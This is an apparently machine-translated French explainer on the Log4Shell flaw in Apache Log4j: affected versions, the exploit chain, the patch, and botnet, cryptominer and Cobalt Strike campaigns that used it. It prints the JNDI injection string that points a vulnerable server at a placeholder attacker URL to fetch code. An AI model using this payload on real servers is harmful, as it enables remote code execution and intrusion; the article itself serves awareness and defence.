Log4Shell Vulnerability

Le 10 décembre 2021, un exploit pour une vulnérabilité critique dans la plate-forme de journalisation Apache Log4j Java a été publiépubliquement. Suivie comme CVE-2021-44228 ou Log4Shell, la vulnérabilité affecte les versions Log4j de Log4j 2.0-beta9 et jusqu'à 2.14.1. Les acteurs de la menace peuvent profiter de l'exploit pour établir un accès à distance non authentifié, exécuter du code, diffuser des menaces de logiciels malveillants ou collecter des informations. La vulnérabilité se voit attribuer un statut critique car Log4j est largement utilisé par les applications d'entreprise et les services cloud.

Détails techniques de Log4Shell

L'exploit commence lorsque l'acteur de la menace change l'agent utilisateur de son navigateur Web. Ensuite, ils visitent un site ou recherchent une chaîne spécifique présente sur des sites Web au format :

${jndi:ldap://[attaquant_URL]}

Par conséquent, la chaîne sera ajoutée aux journaux d'accès du serveur Web. Les attaquants attendent ensuite que l'application Log4j analyse ces journaux et atteigne la chaîne ajoutée. Dans ce cas, le bogue se déclenchera, obligeant le serveur à rappeler l'URL présente dans la chaîne JNDI. Cette URL est utilisée de manière abusive pour gérer des commandes codées en Base64 ou des classes Javapar la suite et les exécuter sur l'appareil compromis.

Apache a rapidement publié une nouvelle version - Log4j 2.15.0, pour traiter et corriger l'exploit, mais une quantité importante de systèmes vulnérables pourrait rester sans correctif pendant une longue période. Dans le même temps, les acteurs de la menace ont rapidement remarqué la vulnérabilité du jour zéro de Log4Shell et ont commencé à rechercher les serveurs appropriés à exploiter. La communauté infosec a suivi de nombreuses campagnes d'attaques utilisant Log4Shell pour fournir un large éventail de menaces de logiciels malveillants.

Log4Shell est utilisé dans les attaques de cryptominer, de botnet, de porte dérobée et de collecte de données

L'un des premiers acteurs de la menace à implémenter Log4Shell dans leurs opérations était les cybercriminels à l'origine du botnet de crypto-mining Kinsing. Les pirates ont utilisé Log4Shell pour fournir des charges utiles codées en Base64 et exécuter des scripts shell. Le rôle de ces scripts est de nettoyer le système ciblé des menaces concurrentes de crypto-mining avant que leur propre malware Kinsing ne soit exécuté.

Netlab 360 a détecté des acteurs malveillants utilisant la vulnérabilité pour installer des versions des botnets Mirai et Muhstik sur les appareils violés. Ces menaces de logiciels malveillants sont conçues pour ajouter des systèmes infectés à un réseau d'appareils et de serveurs IoT, que les attaquants peuvent ensuite demander de lancer des attaques DDoS (Déni de service distribué) ou de déployer des crypto-mineurs.ensuite.

Selon le Microsoft Threat Intelligence Center, l'exploit Log4j a également été ciblé par des campagnes d'attaque larguant des balises Cobalt Strike. Cobalt Strike est un outil logiciel légitime utilisé pour les tests d'intrusion contre les systèmes de sécurité d'une entreprise.Cependant, ses capacités de porte dérobée en ont fait un élément commun de l'arsenal de nombreux groupes d'acteurs menaçants. Par la suite, l'accès illégal de porte dérobée au réseau de la victime est utilisé pour fournir des charges utiles de prochaine étape telles que des ransomwares, des voleurs d'informations et d'autres menaces de logiciels malveillants.

Log4Shell peut être exploité pour acquérir des variables d'environnement contenant des données de serveur. De cette façon, les attaquants peuvent accéder au nom de l'hôte, au nom du système d'exploitation, au numéro de version du système d'exploitation, au nom d'utilisateur sous lequel le service Log4j s'exécute et plus encore.